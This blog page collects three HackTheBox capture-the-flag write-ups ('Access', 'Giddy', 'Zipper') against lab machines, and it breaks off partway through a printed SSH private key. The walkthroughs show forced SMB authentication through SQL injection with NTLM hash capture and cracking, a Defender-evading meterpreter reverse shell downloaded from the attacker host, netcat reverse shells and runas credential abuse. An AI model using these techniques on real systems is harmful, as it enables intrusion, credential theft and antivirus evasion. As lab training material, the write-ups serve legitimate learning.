1n4r1.github.io

© 2024. All rights reserved.

Hackthebox Access Writeup

02 Mar 2019


Explanation:

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of “Access”.

Solution:

1. Initial Enumeration

Port scanning:

root@kali:~# nmap -p- 10.10.10.98 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-30 09:27 EEST
Nmap scan report for 10.10.10.98
Host is up (0.035s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 294.22 seconds

2. Getting User

FTP enumeration:

root@kali:~# ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.
ftp>

Backups directory has a password protected zip file “Access Control.zip”.

ftp> cd engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  01:16AM                10870 Access Control.zip
226 Transfer complete.
ftp>

On the other hand, engineer directory has a mdb file “backup.mdb”

ftp> cd backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM              5652480 backup.mdb
226 Transfer complete.

“mdb” is a file extension for old Access database file (Until Access 2003).
There is a website which shows the inside and we can download it as a csv file.
In a table auth_user, we can find interesting information.

root@kali:~# cat auth_user.csv 
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

we can use the password “access4u@security” for “Access Control.zip”.
After the extraction “Access Control.zip”, what we find is “Access Control.pst”.

root@kali:~/Downloads# ls -la
total 288
drwxr-xr-x 2 root root   4096 Feb 14 22:19  .
drwxr-xr-x 5 root root   4096 Feb 14 22:15  ..
-rw-r--r-- 1 root root 271360 Aug 24 03:13 'Access Control.pst'
-rw-r--r-- 1 root root  10870 Feb 14 22:16 'Access Control.zip'

“.pst” is an extension for data format of MS Outlook Personal Folders.
We can retrieve the inside file “AccessControl.mbox” with “readpst” command.

root@kali:~/Downloads# readpst 'Access Control.pst' 
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
root@kali:~/Downloads# ls -la
total 292
drwxr-xr-x 2 root root   4096 Feb 14 22:23  .
drwxr-xr-x 5 root root   4096 Feb 14 22:15  ..
-rw-r--r-- 1 root root   3105 Feb 14 22:23 'Access Control.mbox'
-rw-r--r-- 1 root root 271360 Aug 24 03:13 'Access Control.pst'
-rw-r--r-- 1 root root  10870 Feb 14 22:16 'Access Control.zip'

The content of “Access Control.pst” is new password for user “security”.

root@kali:~# cat 'Access Control.mbox' 
From "john@megacorp.com" Fri Aug 24 02:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--boundary-LibPST-iamunique-213062548_-_-"


----boundary-LibPST-iamunique-213062548_-_-
Content-Type: multipart/alternative;
boundary="alt---boundary-LibPST-iamunique-213062548_-_-"

--alt---boundary-LibPST-iamunique-213062548_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,

 

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

 

Regards,

John
~~~~

Sounds like we found a initial credential for user “security”.
By trying this password, we can get a remote shell.

root@kali:~# telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
help
Welcome to Microsoft Telnet Service 

login: security
password: # 4Cc3ssC0ntr0ller

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>

User.txt is in a desktop folder for user “security”.

C:\Users\security\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

10/11/2018  05:09 PM    <DIR>          .
10/11/2018  05:09 PM    <DIR>          ..
10/11/2018  04:55 PM                 0 1.txt
10/11/2018  05:03 PM                 0 112.txt
10/11/2018  04:58 PM                 0 2.txt
10/11/2018  04:56 PM                 0 finaly.txt
10/11/2018  04:40 PM                 0 h.txt
10/11/2018  04:54 PM                 0 hhha.txt
10/11/2018  04:46 PM                 0 l.txt
10/11/2018  04:48 PM                 0 llll.txt
10/11/2018  04:55 PM                 0 nnn.txt
10/11/2018  04:45 PM                 0 o.txt
10/11/2018  04:52 PM               262 ooo.txt
10/11/2018  05:09 PM                32 outputme.txt
10/11/2018  04:53 PM                 0 qqq.txt
10/11/2018  04:39 PM                 0 test.txt
10/11/2018  04:38 PM                 0 tewst
08/21/2018  11:37 PM                32 user.txt
              16 File(s)            326 bytes
               2 Dir(s)  16,681,881,600 bytes free

C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38

3. Getting Root

By cmdkey command, we can confirm that windows credential manager is keeping a credential for user Administrator.

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

We can take advantage of this weekness by “runas” command with “/savecred” parameter.
For .exe file, we have to specify its full path.
Highly recommend to spin up windows 10 VM and test the command because it does not have any error output when we attack “Access” with telnet.

C:\Users\security>runas /user:Administrator /savecred "C:\windows\system32\makecab.exe C:\Users\Administrator\desktop\root.txt c:\users\security\root.cab"

C:\Users\security>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

02/14/2019  08:20 PM    <DIR>          .
02/14/2019  08:20 PM    <DIR>          ..
08/24/2018  07:37 PM    <DIR>          .yawcam
02/11/2019  08:04 PM           325,432 accesschk.exe
08/21/2018  10:35 PM    <DIR>          Contacts
08/28/2018  06:51 AM    <DIR>          Desktop
08/21/2018  10:35 PM    <DIR>          Documents
08/21/2018  10:35 PM    <DIR>          Downloads
08/21/2018  10:35 PM    <DIR>          Favorites
08/21/2018  10:35 PM    <DIR>          Links
08/21/2018  10:35 PM    <DIR>          Music
08/21/2018  10:35 PM    <DIR>          Pictures
02/11/2019  08:03 PM            31,761 privesc.bat
02/14/2019  08:20 PM               113 root.cab
08/21/2018  10:35 PM    <DIR>          Saved Games
08/21/2018  10:35 PM    <DIR>          Searches
02/13/2019  08:37 PM            73,802 shell.exe
08/24/2018  07:39 PM    <DIR>          Videos
               4 File(s)        431,108 bytes
              14 Dir(s)  16,761,311,232 bytes free

we can use “expand” command to extract .cab file.
By extracting root.cab, we can achieve root.txt.

C:\Users\security>expand root.cab root.txt
Microsoft (R) File Expansion Utility  Version 6.1.7600.16385
Copyright (c) Microsoft Corporation. All rights reserved.

Adding C:\Users\security\root.txt to Extraction Queue

Expanding Files ....

Expanding Files Complete ...

C:\Users\security>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

02/14/2019  08:20 PM    <DIR>          .
02/14/2019  08:20 PM    <DIR>          ..
08/24/2018  07:37 PM    <DIR>          .yawcam
02/11/2019  08:04 PM           325,432 accesschk.exe
08/21/2018  10:35 PM    <DIR>          Contacts
08/28/2018  06:51 AM    <DIR>          Desktop
08/21/2018  10:35 PM    <DIR>          Documents
08/21/2018  10:35 PM    <DIR>          Downloads
08/21/2018  10:35 PM    <DIR>          Favorites
08/21/2018  10:35 PM    <DIR>          Links
08/21/2018  10:35 PM    <DIR>          Music
08/21/2018  10:35 PM    <DIR>          Pictures
02/11/2019  08:03 PM            31,761 privesc.bat
02/14/2019  08:20 PM               113 root.cab
08/21/2018  10:07 PM                32 root.txt
08/21/2018  10:35 PM    <DIR>          Saved Games
08/21/2018  10:35 PM    <DIR>          Searches
02/13/2019  08:37 PM            73,802 shell.exe
08/24/2018  07:39 PM    <DIR>          Videos
               5 File(s)        431,140 bytes
              14 Dir(s)  16,761,311,232 bytes free

C:\Users\security>type root.txt
6e1586cc7ab230a8d297e8f933d904cf

Hackthebox Giddy Writeup

27 Feb 2019


Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of machine “Giddy” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- -sV -sC 10.10.10.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 11:11 EET
Nmap scan report for 10.10.10.104
Host is up (0.037s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
|_ssl-date: 2019-02-16T09:03:25+00:00; -9m44s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2019-02-14T21:04:56
|_Not valid after:  2019-08-16T21:04:56
|_ssl-date: 2019-02-16T09:03:26+00:00; -9m44s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -9m44s, deviation: 0s, median: -9m44s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.45 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.104/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.104/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/02/17 13:46:26 Starting gobuster
=====================================================
/remote (Status: 302)
/mvc (Status: 301)
/Remote (Status: 302)
=====================================================
2019/02/17 14:00:26 Finished
=====================================================

Gobuster HTTPS:

root@kali:~# gobuster -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u https://10.10.10.104/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : https://10.10.10.104/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/02/17 14:03:14 Starting gobuster
=====================================================
/remote (Status: 302)
/mvc (Status: 301)
/Remote (Status: 302)
=====================================================
2019/02/17 14:17:30 Finished
=====================================================

Sounds like we have same website on port 80 and on port 443.

2.Getting User

We have found 2 interesting pages.

/remote -> redirects to Windows Powershell Web Access
/mvc    -> product list page

Product List page: placeholder

If we click each product of this list, we can redirect to following url like this.

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18

And, if we add a single quote end of this url, we can get this error

placeholder

This means that Product.aspx has SQL injection vulnerability.
In this case, we can actually use an undocumented stored procedure for MSSQL to steal SMB credentials.
At first, we have to run our own SMB server to receive connection. We can do this with Metasploit module.

msf5 > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /root/pw.txt
johnpwfile => /root/pw.txt
msf5 auxiliary(server/capture/smb) > set srvhost 10.10.14.23
srvhost => 10.10.14.23
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.

[*] Started service listener on 10.10.14.23:445 
[*] Server started.

Then, open sql-shell with sqlmap and execute command “xp_dirtree”.

root@kali:~# sqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18 --sql-shell

~~~

sql-shell> EXEC master..xp_dirtree '\\10.10.14.23\baa,foo'
[19:14:59] [WARNING] reflective value(s) found and filtering out
EXEC master..xp_dirtree '\\10.10.14.23\baa,foo':    'NULL'
sql-shell>

Then, we can receive some SMB connections from Giddy.

msf5 auxiliary(server/capture/smb) > [*] SMB Captured - 2019-02-26 20:51:20 +0200
NTLMv2 Response Captured from 10.10.10.104:49723 - 10.10.10.104
USER:Stacy DOMAIN:GIDDY OS: LM:
LMHASH:Disabled 
LM_CLIENT_CHALLENGE:Disabled
NTHASH:79b0c0199a0ea376964a588b6e689534 
NT_CLIENT_CHALLENGE:0101000000000000d45342d902ced40113e8c7ee19074eb600000000020000000000000000000000
[*] SMB Captured - 2019-02-26 20:51:20 +0200
NTLMv2 Response Captured from 10.10.10.104:49723 - 10.10.10.104
USER:Stacy DOMAIN:GIDDY OS: LM:
LMHASH:Disabled 
LM_CLIENT_CHALLENGE:Disabled
NTHASH:eb7cabc3257b6e1fb783257dc135c6e9 
NT_CLIENT_CHALLENGE:010100000000000037b84ad902ced4011bbb4ce038500d1800000000020000000000000000000000
[*] SMB Captured - 2019-02-26 20:51:20 +0200
NTLMv2 Response Captured from 10.10.10.104:49723 - 10.10.10.104
USER:Stacy DOMAIN:GIDDY OS: LM:
LMHASH:Disabled 
LM_CLIENT_CHALLENGE:

~~~

At the same time, we can achieve john format password file in specified path.

root@kali:~# cat pw.txt_netntlmv2 
Stacy::GIDDY:1122334455667788:61ae7af3ca2b17f741a536b66dbc5f47:01010000000000006b068f63f5cdd401e9d1374089ee722200000000020000000000000000000000
Stacy::GIDDY:1122334455667788:823e63d2c40f8e7371451b6d427df435:0101000000000000ab809663f5cdd401fbb9f8a8f29f23cf00000000020000000000000000000000
Stacy::GIDDY:1122334455667788:a6f46c56847372412f2f2efbdc91b3e4:0101000000000000add89d63f5cdd4014b711016199a5cae00000000020000000000000000000000
Stacy::GIDDY:1122334455667788:970b31084f1159dc5f3f88d8634ff3ce:01010000000000004415a463f5cdd401f908739a8756930d00000000020000000000000000000000
Stacy::GIDDY:1122334455667788:592a79993ce2d680292578c0e91571e3:01010000000000004bf3aa63f5cdd40108bfb0813046619500000000020000000000000000000000
Stacy::GIDDY:1122334455667788:fcb7261b28331781821024526c79f785:0101000000000000a930b363f5cdd4019db3fefd5e58060500000000020000000000000000000000
Stacy::GIDDY:1122334455667788:0ac3c4f1fe26f6599525c45777f42b73:01010000000000002147bb63f5cdd401af7ab7fa325a1f5500000000020000000000000000000000
Stacy::GIDDY:1122334455667788:79b0c0199a0ea376964a588b6e689534:0101000000000000d45342d902ced40113e8c7ee19074eb600000000020000000000000000000000
Stacy::GIDDY:1122334455667788:eb7cabc3257b6e1fb783257dc135c6e9:010100000000000037b84ad902ced4011bbb4ce038500d1800000000020000000000000000000000
Stacy::GIDDY:1122334455667788:5dabf08a9de326467d01a72d9ba6f5b8:0101000000000000d8ce52d902ced4017897364fc904360d00000000020000000000000000000000
Stacy::GIDDY:1122334455667788:75d8f9037b40c122710c63b8ec08ffa6:0101000000000000f8965ad902ced4014cf4bac6d908990700000000020000000000000000000000
Stacy::GIDDY:1122334455667788:740c59b5f734961f36bba56c5372ffd0:01010000000000006bad62d902ced40133b27c1378cc3db400000000020000000000000000000000
Stacy::GIDDY:1122334455667788:76eec2d84159141f7d182858182551c4:010100000000000015396bd902ced4010b71ac2a4d8cf7c300000000020000000000000000000000
Stacy::GIDDY:1122334455667788:d15bc192d677e500da515fd590225bb1:0101000000000000a1c473d902ced4015cc71ed4942c2b6f00000000020000000000000000000000

This time, we got username “GIDDY/STACY” and its NTHASH.
By using john the ripper, we can achieve a password for user stacy.

root@kali:~# john pw.txt_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 14 password hashes with 14 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
14g 0:00:00:07 DONE (2019-02-26 21:01) 1.806g/s 348820p/s 4883Kc/s 4883KC/s xevood..wtkate
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Now, we have username and password to login to Powershell Web Access.

placeholder

Since we have powershell, we can easily access to user.txt.

placeholder

3.Getting Root

After logged in the Powershell console, we can find that there is an interesting file

placeholder

By using searchsploit, we can find a Local Privilege Escalation.

root@kali:~# searchsploit unifi video
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                     |  Path
                                                                                                                   | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security Bypass                                          | exploits/php/webapps/39268.java
Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation                                                            | exploits/windows/local/43390.txt
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

This means, if we have a permission for writting C:\ProgramData\unifi-video, We can write a file “taskkill.exe” in that folder.
By default that file does not exist.
However, “Unifi Video” still tries to execute it with privileged permission when it restarts.

Payload creation:
This time, to avoid antivirus, we use a Metasploit evasion module.

msf5 evasion(windows/windows_defender_exe) > use evasion/windows/windows_defender_exe 
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter_reverse_https
payload => windows/meterpreter_reverse_https
msf5 evasion(windows/windows_defender_exe) > set lport 443
lport => 443
msf5 evasion(windows/windows_defender_exe) > set lhost tun0
lhost => tun0
msf5 evasion(windows/windows_defender_exe) > set filename taskkill.exe
filename => taskkill.exe
msf5 evasion(windows/windows_defender_exe) > run

[*] Compiled executable size: 184320
[+] taskkill.exe stored at /root/.msf4/local/taskkill.exe

Then, we had our payload in /root/.msf4/local.
Next, run a simple webserver to let Giddy download the “taskkill.exe”

root@kali:~/.msf4/local# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

After that, launch a reverse shell handler with Metasploit.

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter_reverse_https
payload => windows/meterpreter_reverse_https
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://10.10.14.23:443

To download “taskkill.exe” on our host, cd to “C:\ProgramData\unifi-video” and execute a command on Giddy.

PS C:\Users\Stacy\Documents> 
cd C:\ProgramData
PS C:\ProgramData> 
cd unifi-video
PS C:\ProgramData\unifi-video> 
Invoke-WebRequest -o taskkill.exe http://10.10.14.23/taskkill.exe
PS C:\ProgramData\unifi-video> 
dir
 
    Directory: C:\ProgramData\unifi-video
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        6/16/2018   9:54 PM                bin                                                                   
d-----        6/16/2018   9:55 PM                conf                                                                  
d-----        6/16/2018  10:56 PM                data                                                                  
d-----        6/16/2018   9:54 PM                email                                                                 
d-----        6/16/2018   9:54 PM                fw                                                                    
d-----        6/16/2018   9:54 PM                lib                                                                   
d-----        2/25/2019  12:12 AM                logs                                                                  
d-----        6/16/2018   9:55 PM                webapps                                                               
d-----        6/16/2018   9:55 PM                work                                                                  
-a----        7/26/2017   6:10 PM         219136 avService.exe                                                         
-a----        6/17/2018  11:23 AM          31685 hs_err_pid1992.log                                                    
-a----        6/17/2018  11:23 AM      534204321 hs_err_pid1992.mdmp                                                   
-a----        8/16/2018   7:47 PM              0 hs_err_pid2036.mdmp                                                   
-a----        2/27/2019   2:00 AM         254976 taskkill.exe                                                          
-a----        6/16/2018   9:54 PM            780 Ubiquiti UniFi Video.lnk                                              
-a----        7/26/2017   6:10 PM          48640 UniFiVideo.exe                                                        
-a----        7/26/2017   6:10 PM          32038 UniFiVideo.ico                                                        
-a----        6/16/2018   9:54 PM          89050 Uninstall.exe

Then, restart service “Ubiquiti UniFi Video”

PS C:\ProgramData\unifi-video> 
Stop-Service "Ubiquiti UniFi Video"

~~~

PS C:\ProgramData\unifi-video> 
Start-Service "Ubiquiti UniFi Video"

~~~

With these procedure, we can see that we got a meterpreter shell.
Which has privilege of NT AUTHORITY\SYSTEM.

[*] Started HTTPS reverse handler on https://10.10.14.23:443
[*] https://10.10.14.23:443 handling request from 10.10.10.104; (UUID: fhbxmi4j) Redirecting stageless connection from /zhbkjtSs9OjYs9myhMWwjg8W-NNUTkclqLtPZjGEDiL1a5TuI with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://10.10.14.23:443 handling request from 10.10.10.104; (UUID: fhbxmi4j) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (10.10.14.23:443 -> 10.10.10.104:49708) at 2019-02-27 12:36:46 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

As usual, root.txt is in the directory “C:\Users\Administrator\Desktop”.

meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  842   fil   2018-06-17 04:54:54 +0300  Ubiquiti UniFi Video.lnk
100666/rw-rw-rw-  282   fil   2018-06-17 03:56:45 +0300  desktop.ini
100666/rw-rw-rw-  32    fil   2018-06-17 17:53:24 +0300  root.txt

meterpreter > cat root.txt
CF559C6C121F683BF3E56891E80641B1

Hackthebox Zipper Writeup

24 Feb 2019


Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of machine “Zipper” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.108 -sC -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 21:04 EEST
Nmap scan report for 10.10.10.108
Host is up (0.038s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 59:20:a3:a0:98:f2:a7:14:1e:08:e0:9b:81:72:99:0e (RSA)
|   256 aa:fe:25:f8:21:24:7c:fc:b5:4b:5f:05:24:69:4c:76 (ECDSA)
|_  256 89:28:37:e2:b6:cc:d5:80:38:1f:b2:6a:3a:c3:a1:84 (ED25519)
80/tcp    open  http       Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10050/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.54 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.108

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.108/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2018/10/25 11:21:11 Starting gobuster
=====================================================
/zabbix (Status: 301)
/server-status (Status: 403)
=====================================================
2018/10/25 11:34:40 Finished
=====================================================

2.Getting User

Sounds like an Zabbix is running on the server. placeholder

We can login as a guest user.
By enumeration, we can figure out there is a user “zapper”.

placeholder

zapper uses easily guessable password “zapper”.
By taking advantage of this, we can login to zabbix as general user.
However, we are still not able to use Zabbix GUI console due to its configuration.

placeholder

Then we have to use “zabbix-cli”
At first, we have to install and setup zabbix-cli with following commands.

root@kali:~# git clone https://github.com/usit-gd/zabbix-cli.git

~~~

root@kali:~/zabbix-cli# ./setup.py install

~~~

root@kali:~/zabbix-cli# zabbix-cli-init -z http://10.10.10.108/zabbix
[INFO]: wrote config to '/root/.zabbix-cli/zabbix-cli.conf'

Next, try to connect with “zabbix-cli” command.
As you can see, by using credentail “zapper:zapper”, we can log in to zabbix CLI console.

root@kali:~/zabbix-cli# zabbix-cli
-------------------------
Zabbix-CLI authentication
-------------------------
# Username[root]: zapper
# Password: 


#############################################################
Welcome to the Zabbix command-line interface (v.2.0.1)
#############################################################
Type help or \? to list commands.

[zabbix-cli zapper@zabbix-ID]$

At first, enable the GUI console and change the group to “Zabbix administratiors”.

[zabbix-cli zapper@zabbix-ID]$  show_usergroups
+---------+---------------------------+--------------------+-------------+--------+
| GroupID | Name                      |     GUI access     |    Status   | Users  |
+---------+---------------------------+--------------------+-------------+--------+
|       9 | Disabled                  | System default (0) | Disable (1) |        |
|      11 | Enabled debug mode        | System default (0) |  Enable (0) | me     |
|       8 | Guests                    | System default (0) |  Enable (0) | guest  |
|      12 | No access to the frontend |    Disable (2)     |  Enable (0) | zapper |
|       7 | Zabbix administrators     | System default (0) |  Enable (0) | Admin  |
+---------+---------------------------+--------------------+-------------+--------+

[zabbix-cli zapper@zabbix-ID]$ add_user_to_usergroup zapper 7

[Done]: Users zapper added to these usergroups: 7

[zabbix-cli zapper@zabbix-ID]$ remove_user_from_usergroup zapper "No access to the frontend"

[Done]: User zapper removed from this usergroup: No access to the frontend

Next, login with Web console and go to Configuration->Actions.

placeholder

Create new action which executes reverse shell
Action window: placeholder Conditions window: placeholder Operations window: placeholder

Next, we have to create a new trigger for the action.
Go Configuration->Hosts->Zipper(hostname)->Triggers->Create trigger

placeholder

We have to wait for a while for getting a reverse shell.

root@kali:~# nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.108] 56834
/bin/sh: 0: can't access tty; job control turned off

# Getting tty
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
zabbix@zipper:~$

By some enumeration, we can find an interesting file in /home/zapper/utils

$ cat backup.sh 
#!/bin/bash
#
# Quick script to backup all utilities in this folder to /backups
#
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null
echo $?

As we can see, we found a password “ZippityDoDah”.
We can use it for changing user to zapper.

zabbix@zipper:/home/zapper$ su zapper
su zapper
Password: ZippityDoDah


              Welcome to:
███████╗██╗██████╗ ██████╗ ███████╗██████╗ 
╚══███╔╝██║██╔══██╗██╔══██╗██╔════╝██╔══██╗
  ███╔╝ ██║██████╔╝██████╔╝█████╗  ██████╔╝
 ███╔╝  ██║██╔═══╝ ██╔═══╝ ██╔══╝  ██╔══██╗
███████╗██║██║     ██║     ███████╗██║  ██║
╚══════╝╚═╝╚═╝     ╚═╝     ╚══════╝╚═╝  ╚═╝

[0] Packages Need To Be Updated
[>] Backups:
4.0K	/backups/zapper_backup-2018-10-26.7z
4.0K	/backups/zabbix_scripts_backup-2018-10-26.7z

zapper@zipper:~$

user.txt in in its home directory.

zapper@zipper:~$ cat user.txt 
aa29e93f48c64f8586448b6f6e38fe33

In the ~/.ssh, there is a ssh private key file.
From next time, we can use it to easily have a shell.

zapper@zipper:~$ cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAzU9krR2wCgTrEOJY+dqbPKlfgTDDlAeJo65Qfn+39Ep0zLpR
l3C9cWG9WwbBlBInQM9beD3HlwLvhm9kL5s55PIt/fZnyHjYYkmpVKBnAUnPYh67
GtTbPQUmU3Lukt5KV3nf18iZvQe0v/YKRA6Fx8+Gcs/dgYBmnV13DV8uSTqDA3T+
eBy7hzXoxW1sInXFgKizCEXbe83vPIUa12o0F5aZnfqM53MEMcQxliTiG2F5Gx9M
2dgERDs5ogKGBv4PkgMYDPzXRoHnktSaGVsdhYNSxjNbqE/PZFOYBq7wYIlv/QPi
eBTz7Qh0NNR1JCAvM9MuqGURGJJzwdaO4IJJWQIDAQABAoIBAQDIu7MnPzt60Ewz
+docj4vvx3nFCjRuauA71JaG18C3bIS+FfzoICZY0MMeWICzkPwn9ZTs/xpBn3Eo
84f0s8PrAI3PHDdkXiLSFksknp+XNt84g+tT1IF2K67JMDnqBsSQumwMwejuVLZ4
aMqot7o9Hb3KS0m68BtkCJn5zPGoTXizTuhA8Mm35TovXC+djYwgDsCPD9fHsajh
UKmIIhpmmCbHHKmMtSy+P9jk1RYbpJTBIi34GyLruXHhl8EehJuBpATZH34KBIKa
